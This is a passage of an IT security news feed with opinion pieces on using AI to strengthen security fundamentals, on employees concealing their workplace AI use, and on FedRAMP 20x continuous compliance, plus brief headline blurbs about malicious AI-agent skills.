<p>Identity is a good example. NIST says <a href="https://www.nist.gov/identity-access-management">identity and access management</a> is a fundamental and critical cybersecurity capability. Most CISOs would agree. Yet identity environments remain full of drift: nested groups, inherited entitlements, stale accounts, inconsistent role definitions and privileged access that survives long after the business need is gone. Those issues are rarely invisible. They are just hard to analyze holistically in real time.</p>



<p>This is where AI can become valuable. It can help correlate relationships across directories, cloud control planes, tickets, logs and policy stores. It can help surface unusual combinations of access, identify probable attack paths and prioritize fixes based on business impact rather than raw alert volume. The benefit is not more noise. The benefit is faster understanding.</p>



<p>The same logic applies to vulnerability and patch management. Most enterprises already have scanners, ticketing systems and dashboards. What they often lack is a consistent way to decide which vulnerabilities matter most in the context of exploitability, exposure, compensating controls and asset criticality. Frontier AI can help teams move from a long list of findings to a shorter list of actions that materially reduce risk.</p>



<p>I also see opportunities in configuration management and detection engineering. Security teams are drowning in fragmented data. AI can help normalize evidence from multiple sources, highlight configuration drift and connect seemingly isolated signals into a more realistic picture of operational risk. For lean teams, especially, that matters. It can mean spending more time reducing risk and less time reconciling spreadsheets, duplicate alerts and disconnected workflows.</p>



<p>None of this eliminates the need for skilled practitioners. It simply gives them leverage. And in a field where the volume of exposure routinely outpaces available staff, leverage matters.</p>



<p>The most important point is that this is not a call to hand the keys to a model. It is a call to use AI where the return is clearest: accelerating analysis, improving prioritization and helping teams close long-standing control gaps. In other words, the biggest opportunity is not building a futuristic security theater. It is finally operationalizing the fundamentals at a speed the business can sustain.</p>



<h2 class="wp-block-heading">The board conversation should shift from fear to resilience</h2>



<p>The most important shift Mythos should trigger may not be technical at all. It should change the way CISOs talk to boards, CEOs and operating leaders.</p>



<p>Too often, emerging technologies force security leaders into reactive conversations rooted in fear. The implied message is that a new attacker capability has arrived, so the organization now needs a new budget line, another platform or a fresh round of urgent exceptions. Sometimes that is true. Often it is not. More often, the better response is to connect the new development to existing risk priorities and reinforce the investments that improve resilience across multiple scenarios.</p>



<p>When I speak with executives about AI-driven cyber risk, I try to keep the conversation grounded in three points:</p>



<ol class="wp-block-list">
<li>Most cyber losses still stem from preventable weaknesses. That is not a comforting message, but it is an actionable one.</li>



<li>Improvements in identity, asset governance, patch discipline, third-party oversight and response readiness create value beyond any single threat cycle.</li>



<li>The organizations that manage complexity best will usually outperform those that react most dramatically.</li>
</ol>



<p>That framing also helps boards ask better questions. Instead of asking, “What are we doing about Mythos?” they should ask, “Where would AI make our current weaknesses more expensive or more exploitable?” Instead of asking for a point solution, they should ask whether security and IT operations are aligned on the highest-risk remediation work. Instead of measuring activity, they should measure whether security debt is shrinking.</p>



<p>For CISOs, that is an opportunity. Mythos can be used to justify another round of panic, or it can be used to elevate the quality of the risk conversation. I believe the better path is clear. Use the attention to tighten fundamentals. Use the technology to improve prioritization. Use the moment to reduce chronic control failures that attackers have exploited for decades.</p>



<p>That is why I do not see Mythos as a siren demanding overreaction. I see it as a signal that the enterprises most prepared for the AI era will be the ones that finally operationalize what security leaders have been saying for years: resilience is built through disciplined execution, not headline-driven improvisation.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The dark side of AI success: What your employees know that the board doesn’t]]></title>
<description><![CDATA[A recent article on CIO.com made a sharp observation that deserves to be taken further. The author’s core argument: Organizations are reporting AI activity to their boards — tools purchased, pilots launched, licenses deployed — while quietly avoiding the harder question of whether any of it has a...]]></description>
<link>https://tsecurity.de/de/3626852/it-security-nachrichten/the-dark-side-of-ai-success-what-your-employees-know-that-the-board-doesnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626852/it-security-nachrichten/the-dark-side-of-ai-success-what-your-employees-know-that-the-board-doesnt/</guid>
<pubDate>Fri, 26 Jun 2026 11:06:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A <a href="https://www.cio.com/article/4161509/ai-hype-to-ai-value-escaping-the-activity-trap.html">recent article on CIO.com</a> made a sharp observation that deserves to be taken further. The author’s core argument: Organizations are reporting AI <em>activity</em> to their boards — tools purchased, pilots launched, licenses deployed — while quietly avoiding the harder question of whether any of it has actually moved the business. Outcomes were never defined before the projects began, so success cannot honestly be measured after the fact. The board hears momentum. The CFO sees cost. And nobody can clearly answer what actually changed because of AI.</p>



<p>It is a well-observed problem. But it only tells half the story.</p>



<p>The other half is happening desk by desk, in organizations everywhere. While executives debate ROI frameworks, a parallel economy of AI productivity is running quietly in the background — driven by employees who have figured out how to use these tools and have calculated, quite rationally, that the safest thing to do is say nothing about it.</p>



<p>Understanding what is driving that silence is not a secondary concern. It is arguably the most important AI management challenge most organizations have not yet named.</p>



<h2 class="wp-block-heading">The job security calculation no one talks about</h2>



<p>The most important driver of AI silence is also the most understandable.</p>



<p>Consider an employee who has quietly been using an AI tool to draft client reports. A task that once took four hours now takes 45 minutes. The output is better: Tighter, better structured, more thoroughly referenced. Her manager is pleased. Her clients are happier. And she has said absolutely nothing to anyone about how she is doing it.</p>



<p>When employees find themselves in this situation, the reasoning for staying silent is almost always the same: If I tell them I can do it in 45 minutes, they’ll wonder what I’m doing with the rest of my time. Or they’ll give me more work. Or they’ll decide they don’t need as many of us.</p>



<p>This is not paranoia. The <a href="https://fortune.com/2026/03/25/workers-anxious-scared-insecure-ai-adp-global-survey/" rel="nofollow">ADP Research Today at Work 2026 report</a> — which surveyed more than 39,000 workers across 36 markets — found that only 22% of global workers strongly agreed their job was safe from elimination, even against a backdrop of historically low unemployment. The culprit identified by the report is AI anxiety, gripping workforces regardless of seniority or sector.</p>



<p>The scale of that anxiety has a structural basis. The World Economic Forum’s Future of Jobs Report 2025 (weforum.org) found that while 77% of employers plan to upskill staff to work alongside AI, 41% simultaneously plan to reduce their workforce as AI automates certain tasks. Employees are reading those numbers carefully, even when their employers are not.</p>



<p><a href="https://fortune.com/2025/05/29/employees-secretly-using-ai-hiding-bosses-secret-advantage-peers/" rel="nofollow">Research from Ivanti</a> puts the scale of the resulting silence in sharp relief: Nearly one-third of workers keep their AI use secret from their employer, with 30% specifically citing fear that their job will be cut if they disclose it, and a further 36% staying silent because they enjoy the competitive edge AI gives them over peers. The employee who is most proficient with AI — and therefore delivering the greatest productivity uplift — has the most to lose by saying so. So, they say nothing, the gain disappears invisibly into expanded workload, and it never surfaces in any report to the board.</p>



<p>For organizations trying to understand the true impact of AI on their operations, this is a foundational measurement problem. The biggest wins may be the ones most deliberately hidden.</p>



<h2 class="wp-block-heading">What’s actually happening beneath the surface</h2>



<p>The job security calculation is the most significant driver of AI silence, but it is not the only one. At least four other dynamics are keeping the real story from reaching leadership:</p>



<ol class="wp-block-list">
<li><strong>Competitive concealment</strong>, which the Ivanti data captures well. Not every employee who hides AI use is afraid of their employer — some are protecting an edge over colleagues. In performance-ranked environments — sales floors, bid teams, content departments — knowing how to use AI effectively is increasingly the difference between hitting targets and missing them. People who have that edge are not always eager to share it.</li>



<li>What the data describes as <strong>complacent and non-transparent use</strong>. A <a href="https://www.techtimes.com/articles/310167/20250429/workers-are-hiding-their-ai-usestudy-reveals-why-thats-big-problem-employers.htm" rel="nofollow">KPMG global study of more than 48,000 workers across 47 countries</a> found that 58% of employees are intentionally using AI at work, yet the study identified widespread non-transparency in <em>how</em> it is being used — with many not checking the accuracy of AI outputs or disclosing usage to managers. Nicole Gillespie, co-author of the report and a professor at the University of Melbourne, described the findings as a troubling level of “inappropriate, complex and non-transparent” AI use. Her prescription: Organizations must create transparent, shared learning environments where employees feel safe to experiment with AI without fear.</li>



<li>The third is something harder to name: A kind of <strong>impostor anxiety</strong>. The same Ivanti research found that 27% of employees who use AI at work experience impostor syndrome as a result — they feel that the quality of their AI-assisted work is better than what they could produce alone, and that this gap is somehow dishonest. These tend to be the most thoughtful and quality-conscious adopters in the organization, and they are actively obscuring the AI contribution to their work rather than risk being seen as relying on a crutch.</li>



<li><strong>The shadow infrastructure problem.</strong> A Laserfiche-commissioned survey published in Security Magazine (securitymagazine.com, August 2025) found that 49% of American employees hide their AI tool use from their employer, with only 36% reporting clear AI guidelines and an approved tools list in their workplace — and one in ten describing their organization’s AI environment as “the Wild West.”</li>
</ol>



<p>The data security implications run deeper still. The KPMG global study found that 46% of US employees have uploaded sensitive company data into public AI tools, often without knowing whether the content was confidential. That is not malicious intent — it is the predictable result of a governance vacuum — but it represents a risk exposure that leadership is largely unaware of.</p>



<h2 class="wp-block-heading">What leaders should actually do about this</h2>



<p>These four dynamics — fear of redundancy, competitive concealment, impostor anxiety and shadow infrastructure — combine to produce a fifth and arguably most damaging outcome: The “do more with less” spiral.</p>



<p>When employees quietly use AI to work faster, organizations rarely recognize the efficiency gain and redistribute the capacity thoughtfully. They simply load those employees with more work. The report that used to take four hours now takes 45 minutes, so more reports get assigned. The workload expands to absorb the freed capacity. The employee cannot now reveal the AI assistance without exposing how much time they have been quietly banking. And so, the spiral continues: More output, more concealment and no organizational learning captured.</p>



<p>The CIO.com article’s central argument — that organizations must define outcomes before embarking on AI projects — is correct. But the hidden dynamics described above suggest the measurement problem runs deeper than an absence of pre-defined success criteria. You cannot define meaningful outcomes if the people generating the most significant AI-driven results are structurally incentivized not to tell you about them.</p>



<p>Closing that gap requires organizations to make three interconnected shifts — each designed to tie AI’s business outcomes directly to the employees doing the work and to create the conditions in which those employees are willing to share what they know.</p>



<h3 class="wp-block-heading">Step 1: Make the commitment explicit — and tie it to outcomes from the start</h3>



<p>The first step is to make an unambiguous public commitment that AI productivity gains will not be used as the basis for headcount decisions. But a commitment alone is not enough — it only holds weight when it is paired with something concrete employees can see: Business outcomes defined before the project begins, not after.</p>



<p>Not “AI will make us more efficient” — which means nothing and measures nothing — but observable, agreed results: Client proposal turnaround reduced from five days to two; compliance review time cut by 40%; customer query resolution improved by a defined margin within a defined period. A CIO.com analysis of AI metrics found that the most effective organizations evaluate success across three dimensions: Return on employees (output per hour, backlog reduction), return on investment (labor cost per worker, conversion rates) and return on future (market share signals, new capability unlocked). None of those measures require employees to justify their existence. All of them create a shared definition of what winning looks like.</p>



<p>When business outcomes are defined upfront, the dynamic shifts. Employees can see that the measure of AI’s success is the outcome — not their hours logged or headcount consumed. Leadership has something meaningful to report to the board beyond adoption figures. And the question changes from “how many people are using AI?” to “what did AI change about this result?” — a question employees can answer honestly, because the answer no longer puts their role at risk.</p>



<h3 class="wp-block-heading">Step 2: Build incentives strong enough to override the fear</h3>



<p>This is the step most organizations skip entirely — and it is the most important one. A commitment not to cut jobs and a clear outcome framework create the conditions for honesty. But it does not actively reward it. For employees who have spent months quietly banking efficiency gains, the rational calculation remains: Why surface what I have if there is nothing in it for me?</p>



<p>The answer from the organizations doing this well is: Make sharing genuinely worth it. Not as a vague cultural aspiration, but as a structured, visible program with real rewards attached.</p>



<p>Wharton senior fellow Scott Snyder has proposed treating employee time as capital: If an individual identifies an AI method that saves four hours a week, they receive a portion of that saved time — perhaps 50 hours a year — to invest in further AI experimentation or professional development. This creates a direct incentive to disclose efficiency gains rather than conceal them, and it transforms the calculation from “what do I lose by sharing?” to “what do I gain?”</p>



<p>Real-world examples are already emerging. Law firm Shoosmiths created a £1 million bonus fund tied to Microsoft Copilot usage, with 1,300 employees eligible to receive approximately £770 each if the firm reached one million Copilot uses in its fiscal year. IBM awards “BluePoints” to winners of its annual AI innovation contest, redeemable for electronics, appliances or event tickets. Pharma firm Sanofi uses a points system to reward employees who experiment with AI and share what they learn. As Sanofi’s head of culture put it: “Recognition is the fuel of trust, and trust is what makes AI adoption possible and scalable.”</p>



<p>McKinsey’s 2025 workplace AI research confirms that 40% of employees say incentives and financial rewards would increase their daily use of AI — ranking it fourth among the factors that would most improve adoption, behind training, workflow integration and tool access. EY’s Work Reimagined survey goes further, finding that organizations that formally align rewards with AI behaviors and outcomes are significantly more likely to achieve transformational results, while those that deploy AI onto “fragile talent foundations — weak culture, insufficient learning, misaligned rewards” see productivity benefits lag by over 40%.</p>



<p>The principle behind all of these approaches is the same: Employees will share the benefits of AI when sharing the benefits of AI is rewarded — concretely, consistently and visibly. Until that condition is met, the most productive employees in the organization will remain the quietest.</p>



<h3 class="wp-block-heading">Step 3: Rebuild the board update around outcomes and employee voice</h3>



<p>Third, demand more from the board update. <a href="https://www.grantthornton.com/services/advisory-services/artificial-intelligence/2026-ai-impact-survey" rel="nofollow">Grant Thornton’s 2026 AI Impact Survey</a> found that organizations with fully integrated AI are nearly four times more likely to report revenue growth than those still piloting. The difference is not primarily technological — it is governance and accountability. The leading organizations can demonstrate how their AI makes decisions, who owns the outcomes and what happens when something goes wrong. That level of transparency can only exist when both leadership and employees are operating in the open.</p>



<p>A board update built around outcomes looks fundamentally different from one built around activity. It does not lead with “We have deployed AI across fourteen workflows.” It leads with “Here is what changed in the business because of AI, here is how we measured it and here is what our employees told us about working with it.”</p>



<p>That last element — what employees said — is not a soft add-on. A CIO.com piece on AI adoption published in 2025 put it plainly: “Trust is the invisible infrastructure of AI adoption. It’s built through transparency about intent, honest conversations about job impact, visible upskilling opportunities and letting employees see their peers genuinely benefit.” Employee willingness to use AI, and to share its benefits openly is the most reliable leading indicator of whether an AI program is building genuine organizational capability or simply burning through budget on tools that will be quietly worked around.</p>



<p>Organizations that track this systematically ask three questions on a regular basis: Is AI use growing organically, or only where it is mandated? Are employees who use AI more likely to flag further opportunities, or do they stay quiet? And when AI delivers a measurable outcome, does the team responsible feel able to claim it?</p>



<p>If the answers are “mostly mandated,” “they stay quiet” and “not really” — the organization has a trust and incentive problem that no amount of AI investment will solve. The technology is not the constraint. The environment is.</p>



<p>The board update on AI should not just report how many licenses are deployed and how many pilots are underway. It should grapple with harder questions: What are employees actually using AI for today, including tools we did not procure? What outcomes has that usage produced and how do we know? What would it take to make it safe — and genuinely worthwhile — for them to tell us?</p>



<p>Until those questions are asked — and until the answers can be given without fear and with something to gain — the most important AI story in the building will continue to be told in silence. The board will keep hearing about activity. The CFO will keep questioning ROI. And the employee who cracked the code months ago will keep her head down, produce excellent work and say nothing.</p>



<p>That is the measurement problem the CIO.com article did not quite reach. And it is the one that matters most.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw powers $99 mini PC but it's an AI agentic trap wrapped in Windows 11, delivered with a CPU from 2011 - choose a refurbished PC instead]]></title>
<description><![CDATA[It's not exactly a deal when you look closely at the details]]></description>
<link>https://tsecurity.de/de/3624462/it-nachrichten/openclaw-powers-99-mini-pc-but-its-an-ai-agentic-trap-wrapped-in-windows-11-delivered-with-a-cpu-from-2011-choose-a-refurbished-pc-instead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624462/it-nachrichten/openclaw-powers-99-mini-pc-but-its-an-ai-agentic-trap-wrapped-in-windows-11-delivered-with-a-cpu-from-2011-choose-a-refurbished-pc-instead/</guid>
<pubDate>Thu, 25 Jun 2026 14:17:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's not exactly a deal when you look closely at the details]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple malicious OpenClaw skills found online - including two macOS infostealers]]></title>
<description><![CDATA[Criminals found yet another marketplace to infect and use as a launchpad for malware delivery.]]></description>
<link>https://tsecurity.de/de/3624459/it-nachrichten/multiple-malicious-openclaw-skills-found-online-including-two-macos-infostealers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624459/it-nachrichten/multiple-malicious-openclaw-skills-found-online-including-two-macos-infostealers/</guid>
<pubDate>Thu, 25 Jun 2026 14:17:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Criminals found yet another marketplace to infect and use as a launchpad for malware delivery.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Skill Marketplace Exposes AI Agents to Supply Chain Malware and Financial Fraud]]></title>
<description><![CDATA[A wave of malicious skills targeting the OpenClaw AI agent marketplace has exposed a dangerous new frontier in software supply chain security. Attackers are using the ClawHub skill marketplace to push harmful code into AI agent environments, stealing data and…
Read more →
The post OpenClaw Skill ...]]></description>
<link>https://tsecurity.de/de/3624042/it-security-nachrichten/openclaw-skill-marketplace-exposes-ai-agents-to-supply-chain-malware-and-financial-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624042/it-security-nachrichten/openclaw-skill-marketplace-exposes-ai-agents-to-supply-chain-malware-and-financial-fraud/</guid>
<pubDate>Thu, 25 Jun 2026 12:08:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A wave of malicious skills targeting the OpenClaw AI agent marketplace has exposed a dangerous new frontier in software supply chain security. Attackers are using the ClawHub skill marketplace to push harmful code into AI agent environments, stealing data and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-skill-marketplace-exposes-ai-agents-to-supply-chain-malware-and-financial-fraud/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-skill-marketplace-exposes-ai-agents-to-supply-chain-malware-and-financial-fraud/">OpenClaw Skill Marketplace Exposes AI Agents to Supply Chain Malware and Financial Fraud</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GRC is broken. FedRAMP 20x might fix it]]></title>
<description><![CDATA[We are auditing a curated version of history.



I’ve worked in security long enough now to know something most of us don’t really say out loud. A lot of compliance is theatre. Not all of it, and not all auditors or frameworks, but enough of it that most experienced CISOs know exactly what I mean...]]></description>
<link>https://tsecurity.de/de/3623890/it-security-nachrichten/grc-is-broken-fedramp-20x-might-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623890/it-security-nachrichten/grc-is-broken-fedramp-20x-might-fix-it/</guid>
<pubDate>Thu, 25 Jun 2026 11:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>We are auditing a curated version of history.</p>



<p>I’ve worked in security long enough now to know something most of us don’t really say out loud. A lot of compliance is theatre. Not all of it, and not all auditors or frameworks, but enough of it that most experienced CISOs know exactly what I mean. If you understand how audits work, know how controls are interpreted and can manage scope and narrative well enough, you can often steer things where you need them to go.</p>



<p>That’s uncomfortable to admit, but it’s true. The market now treats things like SOC 2 and ISO 27001 as direct statements about operational maturity and security posture when they really aren’t. They are snapshots. Point-in-time reviews based on selected evidence and sampled testing. That doesn’t make them useless. These frameworks were built for a completely different world where cloud infrastructure was less dynamic, APIs weren’t everywhere and continuous telemetry at scale simply wasn’t realistic. Sampling existed because there wasn’t much of an alternative. That’s before we even mention AI, where technology now changes on a monthly cadence against a regulatory backdrop that speaks in years.</p>



<p>The issue is that the world moved on, but assurance largely didn’t. The team behind  <a href="https://www.fedramp.gov/20x">FedRAMP 20x</a> are attempting to address exactly that problem, pushing assurance towards automation, machine-readable evidence and continuous validation rather than documentation-heavy compliance exercises. Most compliance programs still revolve around screenshots, exported evidence, manually curated narratives and carefully staged representations of reality. And that word, reality, is the important bit because in many cases, we are not auditing reality at all. We are auditing a curated version of history.</p>



<p>That’s why one of the most important things I’ve heard said around FedRAMP 20x is this: <strong>Passing audits does not equal security</strong>.</p>



<p>Exactly. A company can pass an audit while engineers bypass processes every Friday night to hit deadlines. Controls can drift quietly over time while nobody notices because the evidence only exists for a specific audit window. The audit passes because the story passes, and honestly, I think that’s the bit the industry is becoming increasingly uncomfortable with. How many times a year is the production push made as a “hot fix”?</p>



<p>And honestly, I think that’s why movements like GRC engineering are getting so much traction. Not because people suddenly wanted a trendy new title for compliance. But because there’s growing frustration with how artificial parts of the industry have become.</p>



<p>A few months ago, I gave a talk in Seattle comparing the rise of GRC engineering to the rise of grunge music. I’m a huge Nirvana fan, so maybe the analogy was inevitable, but the more I thought about it, the more it made sense. Grunge didn’t emerge because people desperately wanted something shiny and new. It emerged because people stopped believing the polished version was real. Hair metal had become overproduced and performative. Grunge felt rough around the edges, but it also felt honest.</p>



<p>That’s exactly where GRC feels like it is right now. Too much compliance has become about presenting the cleanest possible version of reality instead of exposing operational truth. Too many clean reports. Too many green ticks on trust centers. Too many perfect policies.</p>



<h2 class="wp-block-heading">The sat nav problem</h2>



<p>Which brings me to one of the dumbest weekends of my life.</p>



<p>Many years ago, my wife decided she wanted to go glamping in the Lake District for Valentine’s Day.</p>



<p>We drove north through classic, miserable British weather in a tiny little car completely unsuited for what was coming.</p>



<p>As we got closer to the Lakes, the rain slowly turned into heavy snow.</p>



<p>Then a full blizzard.</p>



<p>The sat nav confidently directed us up a tiny snow-covered road that we physically could not drive up.</p>



<p>We got stuck.</p>



<p>Eventually, we got free.</p>



<p>The sat nav recalculated and sent us up another equally impossible road.</p>



<p>Same outcome.</p>



<p>This happened multiple times until we eventually ended up buried in a snow drift somewhere in the middle of nowhere, waiting for a bloke in a 4×4 to rescue us while trying not to laugh too hard at the idiots in the tiny car.</p>



<p>After about seventeen hours of driving, we gave up and drove home.</p>



<p>Completely failed Valentine’s trip.</p>



<p>But honestly, I think about that weekend a lot when I think about GRC because the sat nav had data. What it lacked was context. It didn’t understand the environment, the conditions, the capability of the vehicle or even the actual outcome we were trying to achieve. We became obsessed with following the prescribed route instead of stepping back and asking whether the route itself still made sense. It reminds me of stories like tourists literally driving into the sea while blindly following GPS directions. The problem wasn’t the absence of data. The problem was understanding the context around the data.  Tourists drive into sea following GPS directions.</p>



<p>A lot of compliance programs behave the same way. The objective quietly becomes “pass the audit” instead of “reduce meaningful risk”, and once that happens, teams start optimising for the framework rather than the security outcome. That’s the shift I think FedRAMP 20x and the broader GRC engineering movement are trying to force. Not just better automation or more integrations, but a fundamentally different way of thinking about trust.</p>



<h2 class="wp-block-heading">Compliance becomes an engineering problem</h2>



<p>One of the central ideas behind FedRAMP 20x is that assurance increasingly needs to be treated as an engineering challenge rather than a documentation exercise.</p>



<p>Historically, most compliance has been based on samples. Sampled pull requests, sampled access reviews and sampled infrastructure evidence. FedRAMP 20x pushes in a very different direction with machine-readable evidence, APIs, telemetry and complete datasets instead of manually curated snapshots. Many of these principles closely mirror those outlined in the <a href="https://grc.engineering/">GRC Engineering Manifesto</a>, which argues that modern assurance should be built on automation, telemetry and engineering disciplines rather than static evidence collection.</p>



<p>One of the biggest mindset shifts for our engineering teams was realising FedRAMP wasn’t really asking for selected evidence anymore. They wanted the underlying operational data itself. Not a screenshot proving something was configured correctly on one specific day, but the actual flow of telemetry that underpinned the control or assurance statement. That’s a completely different way of thinking about compliance because the conversation moves away from “prove this existed once” and towards “show me the operational reality continuously.”</p>



<p>Instead of showing a screenshot proving a virtual machine was configured correctly on one day, you expose every VM in the environment alongside drift data over time.</p>



<p>Instead of selecting a handful of GitHub pull requests, you expose the entire development workflow, including the messy bits where processes were bypassed.</p>



<p>Instead of showing sampled JML evidence, you expose the full lifecycle history of identity management over years.</p>



<p>Honestly, it should feel uncomfortable because that discomfort is probably a sign you’re finally exposing operational truth instead of polishing it away. Trust shouldn’t come from perfection. It should come from transparency.</p>



<h2 class="wp-block-heading">We thought we were ready</h2>



<p>And honestly, that’s exactly why our own FedRAMP 20x journey became so interesting.</p>



<p>We originally planned to move towards moderate through a much longer runway. Then the programme timings changed, government shutdowns caused disruption, and suddenly we found ourselves with around six or seven weeks before audit activity started.</p>



<p>We thought we had a solid plan.</p>



<p>We didn’t.</p>



<p>Or at least not one that was mature enough yet.</p>



<p>We had missed the low pilot earlier in the journey and entered the moderate phase without having already gone through that foundational learning process. We were also the only organization in our pilot group that hadn’t already completed the low pathway first.</p>



<p>That mattered.</p>



<p>We didn’t yet have the operational muscle memory.</p>



<p>No established playbook.<br>No previous iteration.<br>No deeply embedded understanding of how this model actually behaved in practice.</p>



<p>At the same time, we weren’t trying to approach FedRAMP 20x like traditional compliance.</p>



<p>We built direct API connectivity that allowed FedRAMP and auditors to pull complete machine-readable datasets in JSON format directly from the platform. Human-readable exports still existed where required, but the focus was on exposing operational truth rather than curating static evidence.</p>



<p>That’s also one of the core principles behind FedRAMP 20x itself. Controls increasingly need to be both machine-readable and human-readable. The baseline expectation is that a large percentage of controls should be automated with continuous evidence flowing behind them instead of static evidence being manually assembled before an audit.</p>



<p>What that means in practice is that auditors no longer just review a point-in-time evidence pack. They gain ongoing visibility into operational datasets and can interrogate those environments in a much more dynamic way.</p>



<p>That’s a very different mindset from traditional compliance.</p>



<p>And honestly, I think that difference is part of what made the journey so valuable.</p>



<h2 class="wp-block-heading">We didn’t fail. We iterated</h2>



<p>Because I don’t actually think what happened next was failure.</p>



<p>I think it was iteration.</p>



<p>Modern engineering teams don’t release perfect software on day one. They test, rebuild, refactor, improve and iterate continuously based on telemetry and feedback.</p>



<p>Applications go through:</p>



<ul class="wp-block-list">
<li>Testing</li>



<li>User feedback</li>



<li>Redesign</li>



<li>Bug fixing</li>



<li>Telemetry analysis</li>



<li>Continuous improvement</li>
</ul>



<p>Nobody expects version one to be perfect.</p>



<p>Yet historically, GRC has behaved completely differently.</p>



<p>Build the controls.<br>Collect the evidence.<br>Pass the audit.<br>Repeat next year.</p>



<p>The audit becomes the finish line. Our finish line became a “good effort,” “we think you’re ready for a Low authorization, but not Moderate just yet.” For a moment, it felt like failure. It hurt. It felt fundamentally different from any other assessment or audit as we genuinely didn’t know what we’d achieved. In fact, FedRAMP 20x feels fundamentally different and maybe that’s the whole point.</p>



<p>The process itself became feedback.</p>



<p>Not: Can you tell a convincing enough story?</p>



<p>But: What does your environment actually look like and how do you continuously improve it?</p>



<p>That’s a completely different mindset.</p>



<p>One of the recurring themes throughout FedRAMP 20x is that assurance should improve through continuous iteration rather than annual point-in-time validation.</p>



<p>Exactly.</p>



<p>That’s how engineering works.</p>



<p>The Low authorization wasn’t the end state. It was a checkpoint and a recalibration moment that helped us understand where the next iteration needed to go.</p>



<p>And honestly, if you can speedrun moderate FedRAMP with perfectly polished dashboards and no uncomfortable truths exposed, then the framework probably isn’t doing its job.</p>



<p>That’s one of the things I genuinely appreciate about FedRAMP 20x.</p>



<p>It challenges your assumptions.</p>



<p>It forces you to rethink approaches that have become normalized across large parts of the compliance industry.</p>



<p>Historically, proving infrastructure security often meant screenshots or exported configs. Now we can expose every VM, every drift event and the full history of posture changes across the environment.</p>



<p>That changes behavior massively because you can no longer optimize around the cleanest possible sample. You have to maintain the actual posture continuously.</p>



<p>Historically, proving SDLC maturity meant selecting a handful of pull requests. Now we can expose the entire workflow, including every bypassed approval or manual push into production.</p>



<p>Historically, proving identity governance meant sampled JML reviews. Now we can expose the operational history of the full identity lifecycle over years.</p>



<p>And honestly, that was one of the areas that challenged some of our own assumptions the most.</p>



<p>Traditional sampled evidence can make processes look consistently successful because you’re only reviewing selected examples. But operational truth is different. You only need one joiner, mover or leaver process to fail in the wrong way for the risk to become real.</p>



<p>That’s exactly the kind of thing continuous operational visibility exposes much more quickly than traditional evidence collection.</p>



<p>That’s not just better evidence.</p>



<p>It’s a fundamentally different philosophy of assurance.</p>



<h2 class="wp-block-heading">The rise of GRC engineering</h2>



<p>And this is where I think GRC engineering becomes genuinely important.</p>



<p>Not because everybody suddenly needs to become a software engineer, but because the discipline itself is evolving from a documentation exercise into an operational engineering problem.</p>



<p>Modern GRC teams are increasingly building telemetry pipelines, integrations, APIs, infrastructure visibility and continuous assurance layers. And honestly, some of those pipelines are much harder to build than people realize. Cloud infrastructure, CSPM tooling and application security platforms are relatively straightforward because the data is already fairly structured and accessible. The really difficult parts are the messy operational systems that organizations historically handled through process and human coordination.</p>



<p>Things like policy management workflows, budget approvals, software bill of materials tracking and non-standard operational processes are far harder to standardize and expose consistently.</p>



<p>That’s another reason this shift matters so much. It forces organizations to operationalize areas that historically lived in spreadsheets, meetings or tribal knowledge.</p>



<p>That’s a very different skillset from managing spreadsheets and coordinating screenshots.</p>



<p>More importantly, it changes the conversations.</p>



<p>One of the things I enjoyed most throughout the FedRAMP 20x process was that discussions increasingly stopped being: How do we satisfy this control?</p>



<p>And became: What risk are we actually trying to reduce here?</p>



<p>That’s such a healthier conversation for security teams to have. Because not every risk matters equally to every organization. Not every control meaningfully improves security posture. Not every framework requirement deserves the same operational investment.</p>



<p>Traditional compliance often struggles with that nuance because it optimizes around consistency and uniformity.</p>



<p>Modern engineering-led assurance feels different.</p>



<p>It feels more contextual, more operational and honestly far more honest.</p>



<p>And honestly, honesty is probably the biggest thing missing from large parts of compliance today.</p>



<p>We’ve built an industry where everyone feels pressure to look perfect.</p>



<p>Perfect dashboards. Perfect controls. Perfect audit outcomes.</p>



<p>But real engineering environments are never perfect.</p>



<p>They have bugs, drift, exceptions, failures, temporary workarounds and weird edge cases.</p>



<p>That doesn’t automatically mean the environment is insecure. It means it’s real.</p>



<p>I actually think one of the biggest mindset shifts FedRAMP 20x and the broader GRC engineering movement are pushing is this: nonconformities should not automatically destroy trust. Handled correctly, they should build it.</p>



